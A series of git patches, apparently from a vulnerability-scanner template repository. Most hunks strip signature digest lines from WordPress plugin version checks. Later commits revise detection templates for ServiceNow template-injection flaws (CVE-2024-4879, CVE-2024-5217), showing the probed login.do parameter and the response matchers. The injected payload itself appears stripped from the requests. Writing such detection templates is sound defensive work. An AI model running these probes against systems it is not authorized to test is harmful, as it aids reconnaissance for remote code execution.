a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml index 0c61bacf17f..2ae6bafbbab 100644 --- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml +++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210097c9b45a2b0b5ad0d4b20b7151a581cbfdb78425f011984f1d81fe27e798bae202204649eda04f8d32a1bd16d38e17905cae24a61e545207e437a74409d43bf33708:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index 62a5c2791a6..d0dc8d92bb9 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210093208f4544374ead9506bd1274675b2d92afb9d12d6b336d07330d3b7d72d520022059a822256b284f210bdf8653d3a10a97004e074320ec5cd1d0ce66fd37d7b3b3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index 67b382c9a4b..c49bbc2b6d1 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009f813791da6cc7113b0d45b986d1c705b6fe329dd430e0555cb06c588c76fd3c02206c6ff0d281972bc079ff8342dfb33eb165182de4bd42263fc2fdc802b04970cd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index 7cea6156853..27586cbd9d1 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f73fe06556ca4f14e6dbefd0574e1f4a1aed39038be0cc266519a51131adcada022100f3f88eaa0d3be61fecb6f65ba1c56aefd5996813813c6862c6ebccbebf366abc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index 5f30c9078da..946272f0a90 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100be3fa22aff21f7db47174dce95fdc5448a1dd087a4ed3e9047600af7bbff593e022100e5b6f5e099925e40598dbe6554c6301dea8b3c8e983d1579a72a2e6d5acec917:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml index d67838e39cf..aa297068720 100644 --- a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210099f5e88a5d21c69667d22e471b9113511a354419da86194c1880a4ee7f73719d02200726c12e2486232ad6185b5d0d8f95526741e76867adcb4edefc4c7b77e5e093:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index 62976fadac5..290d53ab7ed 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221008855339c7751b360e33b130b461233c593c6a30423f18462ca2857fe7d59b02f022100bfbd7ddca6bead14e3e312460edb487edd28b98911bbfe27a20fab442e1aa93f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index a099a483a09..e83e8d79e78 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502201013c5bbbcab93d63627dfeca448d2481d0a84656d2ff76777523f1942a36a68022100ecb7b63531f2bbdc2ca51fabb471c862dd87a60fcab5e528a2f03a42e124c99a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index 8fa01a96e72..f1c16275a2a 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402202d7a0824c64cac98d593febc8f31b009126933752c3e9d27f7fbfed3e82725ea02202bc9e186b674790e3bcf1d4694f9dd5c0879248b64d84c6ceb2a6b3189146985:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index 0741418c0d0..fc072e19d8a 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b77f3b600a06cbbf5fd625f623a3b21caadc7d0c6f665b71f8cc535c27ccceb9022100fb8e58140097038269b37cd2a6021df8aa77237aff6dcb61773cd6bc1c0adffb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index 895cdb890e4..da9df0e8a5c 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b54da4213f440867f265f89f3691ba60dc03f536bae6561ff68e661937b49990022100eca20a2bb85cd12a4cfca7582a6b8a0a4acbc6e8c9af0233261410bf72f1318b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index 0e1994a4fcb..f8113d97506 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a38fe02b7265c26c09d083403e553b939a8e12857204c36c7b89e7c7328e4ba0022100e9db293cf44de1a5c082216149e10a94c76af90532fbb0aab04c6e3970224474:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index 4314a4073be..5f80282ab22 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220490cbdf83a0c7138b5a22ac57849dc5bcc6a5a9f0d8768c8f26ccf9bd73b90d2022100ff5dee04a1d41a2abcb9d30ae0fd8d9ab214e6959050e8fc9703a22b9ccde6f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index 628dae26e63..5725d5bb3f8 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d0460b28e72144a570127a8a152d0a1df737c4739caf5b363463da3ae50def010221009bbed5b55f4da0a4ca2d5399a40654a19c08c0a03808078a3f6ca3cb7ac6f52f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index 7e505846ff5..f67a8bc18a8 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203f0bc1e6e42412e800058e3a38a3359014075f7ac76b91a4129e0d495770c7bc022100a1d4850a69daa1df5a4a6ddccb2d5d3e0166325199c21a79ba5a9e3d4c39def8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index fc5dee5b002..b9bd4be0a8b 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502201b48c84fc07db2502c03f777a2a67e414369635f96fa1368db46c4d1e1ff86c8022100c836f1fc9cf3962922c1c93f35a066ba78ad5866d3c31ed6c6fa99dea9a73481:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index 54f14ff4399..bece4ce486a 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009b6da2d686ac6a328e6e91ffa150a155418984677df6bdebb65967ab9e85d76802202faa25a0478e896185597b7b3cafab51d67b08f3b2eb16c84c6e4bfe94c86f13:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index 51b323580a7..138b0aa9a69 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b7217d896958cb05697bb3a37e8cf0a3dcdf43013986ebc289178643cd6b0960022054842db494950f0c1e2179b41c7ded3dad71eff105402496181ebae25c7901f5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index e0e73ec0156..68bf71bc839 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d349af52ec14d5a3159d65c082a65a987efc95ca24153d8780f3dd3a4238100a022100c6c95d51fc5f70ad3cbd948af45e7cbf471841672fd232fa0da0817214671b32:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index f16ad833e4a..10dad2d2fb8 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f00ea28c2555739c2f201991b222d8726994383aba5e12ef181c730cdf6514ed02201983698d472efbf280b8e83143928eb2a82026b283a1eb8a990db9d6e018469a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml index 35804d6210e..e9efe6fb53a 100644 --- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml +++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022030cd35a3a89bbc9792988aa02e4c66df96b19b332dc9e313363dc5201602001802205e82fb8496a6cd9056ac66599f3341d023d68524d097438727eab096feb73501:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index adf53f064f9..c3d10f01359 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205212c8b7e83bf81f59d32a4ce8101641b6d77e7bb070cd54da5c5c36ac211d170221008f4cb36e35eb3a4df0930fee33903405d4d69d01dd1518755b4989674d15afde:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index 70fd52525e7..4a8bc6b75c7 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022068c352046b38d5de9b968796c6a0ad507f44de816accb907376cd96f69bcc6d0022100cde26b7eda7a1e9ee7ab5a0cd8a347ec776eec6ce428ef848e9991cc35a35db6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index cf22cab68ea..d2c74355bd7 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c55434dd9d277759778ccc2e79706aa230036bf1a068552eab760e0e1d144f6b022012ea0155c4342079df63a9c5300c02f6ae3017450b9d6156646af41e74a55d4a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index d885ff3faee..94b8494b08d 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100fd48a444f2baf63545e75757601e66d9d20a290b13b51fc8dd64fdbfd929c35f022100abd7003d6c190eb5c4215ea5b1060258c4440d4fadcce4c4b0bd735c2f5dcb74:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml index 6f9da74cae9..108aba79e99 100644 --- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml +++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402206d4b5a920160c8cd6b93b436ef63f1177b14a8af414b7fa18a1c3d4f5811709d02207e1a424affe390f466f6f69c1b2c4bbf9c9b462450559625a17cc2e87674d1a6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index dc84f1c6a49..f6f6bf55667 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203aa723dd4aee2c9e596cfbd43b1d1b018b3210aa953a9aed070fe68536e31a1d022100e92ac3098771e4a2ab26c43e267d5ecf2993e3c770c3ee193913ec95e5067aa1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-seopress.yaml b/http/technologies/wordpress/plugins/wp-seopress.yaml index 29214c89401..483cb7cac74 100644 --- a/http/technologies/wordpress/plugins/wp-seopress.yaml +++ b/http/technologies/wordpress/plugins/wp-seopress.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022059721dd8b02050eeeef7211d6ddc8c6f5c327d8bcf9bac29cd1d264db14742330221008e65617e4e31fbed04b338e435c9b4dae3c57094c332d01f6c9a969316dab4d6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index 9977df376fa..a132c98df49 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100dd6e114fd42a31c3e0024f68927972b9b67535592094cdc1e322047afe917efc02207af3b38a929f8ebe39b4904baef73a3104b1c7b5e9e19d1d93f29bfbfe93e914:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index 78a69d103ec..135bbee0467 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e8e67df2e82cebd4ef73b5fc34caca32343da02ac08327167b257aca2696b4fb02210094b71c31669b3a9a84887054bcdfd88de08783c30f6ae542d42c93aa779c76fc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index b1726192cd9..5b690d96c0d 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a13deec49f9210240a8bea9315ec997f64157909437278302166238cf5626b30022047c30dcc5043a96f954af02341c3f4337d22ac4cbdb67b2f51cef5ba8e673507:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index 0679a001f35..16c7d6cff55 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c5ab2b278c189539908d5eb36294ffc0342917bd26b7208d91d570f93fd4d35e022100dddc49e08813e1fc47b2483923352ce00e311c047576c6c26a0033998b71db8b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index 79a4a0ea2c4..ab099f357e3 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200b688a4888b077484fe596645fc8ac3f488e39e8439c21dfcbf9727a568d8eea022100b2dd0b7680ff49c9209522a2434f59e96a67b264d18ea18091237d6e9de2d550:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index 47d6d3fc03f..ad0b8f8fed6 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022054893c90d92a403505a413ae3d9ecc986fd27d89b3820c8b8da9c42c81ca4f5b022059f923045b7a8e9bfa6efabef8f37af25dfc56aaae8e0335f47725587439d1fd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index be61093ee30..aaaf0f9a172 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220399e770a7d511e3c609d2f16df9b710e2a1ccb6e95a9662431c3b8e2d01954c002203839aee43d2f0ee06a605f4363cae3ed8275f86076d9b8ca0eb04dd6d3825746:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index 51c453e66ea..f943c7afebd 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502202fa51b7060e4bb18976a21519067c54c0dbc8e91fbe50821b5e1cd0e8f9b1fb3022100c4f09621951f5a234bb7b018e55f4e8e8b0a891d193bd2d237e621644b23047b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index 8f429f31357..062e5c85b49 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ad5f880a2e3f6a3e85d73566b1e09682714e63a58cc7b31905b157a39844d42602204adb0be0dbcfb0bbf46ebaf828b44418a45d20d8dc47d3b14a9c9505db4eb0fb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index df24e4294a9..6dcfdda1174 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022028b65b533a28836a9e78665f1b68f20824f05271589f6a791660e5c45243b0bd0220120ba40d5a24cd3640bf081f67bf37251e4c4e1cc0c63a4542aca9912917e3a7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 5a6a759873a9dbcc3f589b0010ccb118af65f8c8 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 15 Jul 2024 10:07:12 +0530 Subject: [PATCH 141/247] Update CVE-2024-4879.yaml --- http/cves/2024/CVE-2024-4879.yaml | 9 +++++---- 1 file changed, 5 insertions(+), 4 deletions(-) diff --git a/http/cves/2024/CVE-2024-4879.yaml b/http/cves/2024/CVE-2024-4879.yaml index 1f8343fa62b..c8184a9c4c7 100644 --- a/http/cves/2024/CVE-2024-4879.yaml +++ b/http/cves/2024/CVE-2024-4879.yaml @@ -1,15 +1,16 @@ id: CVE-2024-4879 info: - name: Jelly Template Injection Vulnerability in ServiceNow UI Macros + name: ServiceNow UI Macros - Template Injection author: DhiyaneshDk,ritikchaddha - severity: critical + severity: unknown description: | ServiceNow has addressed an input validation vulnerability that was identified in Vancouver and Washington DC Now Platform releases. This vulnerability could enable an unauthenticated user to remotely execute code within the context of the Now Platform. ServiceNow applied an update to hosted instances, and ServiceNow released the update to our partners and self-hosted customers. Listed below are the patches and hot fixes that address the vulnerability. If you have not done so already, we recommend applying security patches relevant to your instance as soon as possible. reference: - https://www.assetnote.io/resources/research/chaining-three-bugs-to-access-all-your-servicenow-data - https://support.servicenow.com/kb?id=kb_article_view&sysparm_article=KB1644293 - https://support.servicenow.com/kb?id=kb_article_view&sysparm_article=KB1645154 + - https://nvd.nist.gov/vuln/detail/CVE-2024-4879 metadata: verified: true max-request: 1 @@ -27,7 +28,7 @@ info: http: - raw: - | - GET /login.do?jvar_page_title= HTTP/1.1 + GET /login.do?jvar_page_title= HTTP/1.1 Host: {{Hostname}} matchers-condition: and @@ -35,7 +36,7 @@ http: - type: word part: body words: - - '
49
' + - '
1787569
' - type: word part: header From 742e1f04678af60515a91313c12261f08ef6db97 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 15 Jul 2024 10:09:47 +0530 Subject: [PATCH 142/247] lint fix --- http/cves/2024/CVE-2024-4879.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-4879.yaml b/http/cves/2024/CVE-2024-4879.yaml index c8184a9c4c7..133e72f7f3e 100644 --- a/http/cves/2024/CVE-2024-4879.yaml +++ b/http/cves/2024/CVE-2024-4879.yaml @@ -1,7 +1,7 @@ id: CVE-2024-4879 info: - name: ServiceNow UI Macros - Template Injection + name: ServiceNow UI Macros - Template Injection author: DhiyaneshDk,ritikchaddha severity: unknown description: | From 394109efe83ce93b07971f7f778affa91ba1da9e Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 15 Jul 2024 10:11:27 +0530 Subject: [PATCH 143/247] Update CVE-2024-5217.yaml --- http/cves/2024/CVE-2024-5217.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-5217.yaml b/http/cves/2024/CVE-2024-5217.yaml index 998cff4b47c..5f5f3502d67 100644 --- a/http/cves/2024/CVE-2024-5217.yaml +++ b/http/cves/2024/CVE-2024-5217.yaml @@ -1,7 +1,7 @@ id: CVE-2024-5217 info: - name: ServiceNow Incomplete Input Validation in GlideExpression Script + name: ServiceNow - Incomplete Input Validation author: DhiyaneshDk,ritikchaddha severity: critical description: | @@ -10,6 +10,7 @@ info: - https://www.assetnote.io/resources/research/chaining-three-bugs-to-access-all-your-servicenow-data - https://support.servicenow.com/kb?id=kb_article_view&sysparm_article=KB1644293 - https://support.servicenow.com/kb?id=kb_article_view&sysparm_article=KB1648313 + - https://nvd.nist.gov/vuln/detail/CVE-2024-5217 metadata: verified: true max-request: 1 From cc3bb11f76bc52ad66b6cb939405cb7168a882f7 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 15 Jul 2024 10:13:33 +0530 Subject: [PATCH 144/247] Update servicenow-title-injection.yaml --- http/misconfiguration/servicenow-title-injection.yaml | 9 ++++----- 1 file changed, 4 insertions(+), 5 deletions(-) diff --git a/http/misconfiguration/servicenow-title-injection.yaml b/http/misconfiguration/servicenow-title-injection.yaml index f1957d4b6fe..12c5ba8f5dd 100644 --- a/http/misconfiguration/servicenow-title-injection.yaml +++ b/http/misconfiguration/servicenow-title-injection.yaml @@ -23,17 +23,16 @@ info: tags: cve,cve2024,servicenow,injection http: - - raw: - - | - GET /login.do?jvar_page_title= HTTP/1.1 - Host: {{Hostname}} + - method: GET + path: + - "{{BaseURL}}/login.do?jvar_page_title=" matchers-condition: and matchers: - type: word part: body words: - - '<style><foo>abc</foo></style>' + - '<style><foo>Injected Title</foo></style>' - type: word part: header From da77946a5391add6a355f184fbed54bf2833ee39 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Mon, 15 Jul 2024 04:44:00 +0000 Subject: [PATCH 145/247] Auto Generated New Template Addition List [Mon Jul 15 04:44:00 UTC 2024] :robot: --- .new-additions | 2 ++ 1 file changed, 2 insertions(+) diff --git 